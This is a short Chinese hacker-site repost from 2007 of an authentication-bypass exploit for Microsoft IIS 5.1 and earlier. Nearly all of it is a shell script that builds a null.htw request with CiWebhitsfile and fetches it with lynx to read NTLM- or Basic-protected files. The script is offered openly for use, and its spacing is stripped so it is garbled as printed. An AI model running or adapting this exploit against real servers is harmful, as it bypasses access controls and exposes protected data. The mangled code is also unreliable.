Microsoft IIS 5.1 以下版本绕过认证漏洞

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------

 

漏洞描述:MicrosoftIIS5.1以下版本绕过认证漏洞
漏洞来源:资库漏洞研究中心
发布日期:2007-06-03
#!/bin/sh
#
#NTLM&&BASICAUTHBYPASS:)
#
#sha0[at]badchecksum.net
#Basedonmyadv:)

if[$#!=2]
then
       printf"USAGE:\t\t$0<Site><ProtectedObject>\nExample:\t$0";
       exit0
fi

site=$1
protectedObject=$2
evil=$site'/shao/null.htw?CiWebhitsfile='$protectedObject'&CiRestriction=b&CiHiliteType=full'
lynx-dump$evil

#hacker.zcuu.com[2007-06-03]

 

【免费加入会员】【我要投稿】【关闭本页】